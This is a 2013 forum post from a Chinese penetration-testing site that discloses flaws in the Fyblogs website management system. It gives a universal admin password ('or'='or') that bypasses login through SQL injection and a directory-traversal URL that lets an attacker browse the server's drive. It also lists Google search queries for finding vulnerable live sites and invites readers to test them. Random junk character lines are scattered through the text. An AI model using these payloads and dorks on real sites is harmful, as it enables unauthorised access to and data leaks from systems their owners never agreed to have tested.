中国网络渗透测试联盟
标题:
Fyblogs网站管理系统漏洞
[打印本页]
作者:
admin
时间:
2013-3-7 13:07
标题:
Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过
. q$ ]! }9 }7 A( N& z( t& h
$ ^5 e0 t6 i- {4 _1 ]1 ~
简要描述:
7 Y/ x* R6 S: s* r
% F$ R1 K" b/ p* T* i
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
! c, v+ k9 S& a
# p! L/ O5 \# E' L$ b4 H
详细说明:
8 t0 c! _5 f, o3 C- W
! y. Y0 n: Q* Q E) ^" ?, c
后台万能密码 'or'='or'
1 y& J. A2 [6 R# f
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
: o) N4 A% N n4 x
admin/uploadfile.asp?currentFolder=/upfiles/../
3 Q$ ?: T0 W' e8 y
- ~: M1 Y# G- E/ }) ^
漏洞证明:
i( C& R8 B& |
5 s" e! S! o$ e) x! S t2 D3 \
谷歌:inurl:type.asp?id=1 新闻中心
0 o* M% n4 l1 F! A
或者 :inurl:download_ok.asp?
' `+ y# l# n/ p, H5 l* W- i
# u$ `, q0 d3 ]( N) p2 Y/ x& h
可以测试
3 ^; j' Y6 N; D7 e3 f' N: n
9 k8 n6 ^! s( ^/ D- f
2 ]. L3 f# C# X
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2